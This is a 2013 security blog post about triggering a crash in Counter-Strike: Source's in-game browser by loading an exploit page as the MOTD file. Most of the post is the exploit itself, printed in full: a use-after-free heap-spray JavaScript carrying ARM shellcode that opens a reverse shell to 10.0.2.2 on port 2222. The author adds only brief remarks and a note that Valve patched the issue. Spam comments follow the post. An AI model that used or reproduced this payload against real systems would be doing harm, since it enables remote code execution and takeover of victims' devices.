Comments

Friday, March 22, 2013

Valve Steam Counter Strike Source Bug Hunting

Posted by at Friday, March 22, 2013 Read our previous post

Some times i play Counter Strike Source,for years ago i think this bulitin webserver/browser are vuln.But i never testet it now i know much more about Debugging,Exploit,Stack Smashing ……Than i found this Android Browser Exploit and want to test it on Css webserver .

Put motd.txt into steam folder Start Counter Strike Start a local game.The Game Load Motd next the game crashed instand with a error msg i dont know it.I Dont thinked it got fixed so fast Smiley But i think it was a Buffer overflow msg out of range or any thing else.It was very late ...

An update to Counter-Strike: Source has been released.

The update will be applied automatically when you restart Counter-Strike: Source.

The major changes include:
# Disabled Java for the in-game web browser "Thanks Valve for Remove Crap Java ;)

1 Day later it got fixed with Disabling Java plugins ……. hrhr

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/1999/REC-html401-19991224/loose.dtd">
<html>
<head>
<title>Cstrike MOTD</title>
<style type="text/css">
pre {
font-family:Verdana,Tahoma;
color:#FFB000;
}
body {
background:#000000;
margin-left:8px;
margin-top:0px;
}
a {
text-decoration: underline;
}
a:link {
color: #FFFFFF;
}
a:visited {
color: #FFFFFF;
}
a:active {
color: #FFFFFF;
}
a:hover {
color: #FFFFFF;
text-decoration: underline;
}
</style>
</head>
<body scroll="no">
<pre>
You are playing Counter-Strike: Source
Visit the official CS web site @
www.counter-strike.net
<a href="http://www.counter-strike.net">Visit Counter-Strike.net</a>
</pre>
</body>
</html>

<html>
<!--
# Exploit Title: Counter-Strike: Source motd_css_poc.txt BOF
# Date: 2013/19/03
# Author: cr4shyyy
# Software Link: http://store.steampowered.com/app/240/
# Version: < before 20.03.2013
# Tested on: Windows
# CVE :
# Just test if its works with the Steam build in webserver and it is crashed.I cant test it more cant Olly it.An update to Counter-Strike: Source has been released. The update will be applied automatically when you restart Counter-Strike: Source. The major changes include:
# Disabled Java for the in-game web browser "Thanks Valve for Remove Crap Java ;)

This is the exploit used in my Austin bsides presentation that returns a shell. The slides are at http://www.slideshare.net/mjza/bsides
email: mkeith AT exploitscience.org
-->

<head>
<script language="JavaScript">
function heap()
{

var id = document.getElementById("target");
var attribute = id.getAttributeNode('id');
nodes = attribute.childNodes;
document.body.removeChild(id);
attribute.removeChild(nodes[0]);
setTimeout(function() { for (var i = 0; i < 70000; i++) {var s = new String(unescape("A")); };


var scode = unescape("\u0060\u0060");
var scode2 = unescape("\u5005\ue1a0");
var shell = unescape("\u0002\ue3a0\u1001\ue3a0\u2005\ue281\u708c\u3a0\u8d\ue287\u0080\uef00\u6000\ue1a0\u1084\ue28f\u2010\ue3a0\u708d\ue3a0\
\u708e\ue287\u0080\uef00\u0006\ue1a0\u1000\ue3a0\u703f\ue3a0\u0080\uef00\u0006\ue1a0\u1001\ue3a0\u703f\ue3a0\u0080\uef00\u0006\ue1a0\u1002\ue3a0\u703f\ue3a0\u0080\uef00\u2001\ue28f\uff12\ue12f\u4040\u2717\udf80\ua005\ua508\u4076\u602e\u1b6d\ub420\ub401\u4669\u4052\u270b\udf80\u2f2f\u732f\u7379\u6574\u2f6d\u6962\u2f6e\u6873\u2000\u2000\u2000\u2000\u2000\u2000\u2000\u2000\u2000\u2000\u0002");
shell += unescape("\uae08"); // Port = 2222
shell += unescape("\u000a\u0202"); // IP = 10.0.2.2
shell += unescape("\u2000\u2000"); // string terminate

do
{
scode += scode;
scode2 += scode2;

} while (scode.length<=0x1000);

scode2 += shell


target = new Array();
for(i = 0; i < 300; i++){

if (i<130){ target[i] = scode;}
if (i>130){ target[i] = scode2;}

document.write(target[i]);
document.write("<br />");
if (i>250){
// alert("freeze");
nodes[0].textContent}

}

}, 0);
}
</script>
</head>
<body onload=heap()>
<p id=target></p>
</body>
</html>

2 comments:

  1. BlueHost is definitely one of the best hosting company for any hosting plans you might require.

    ReplyDelete
  2. Quantum Binary Signals

    Professional trading signals sent to your mobile phone daily.

    Follow our signals right now & earn up to 270% daily.

    ReplyDelete

[#] iNFO [#]

All the information provided on this site is for educational purposes only.
 
The site and it's author is in no way responsible for any misuse of the information.
©2012 Security is just an Illusion is powered by Blogger - Template designed by Stramaxon - Best SEO Template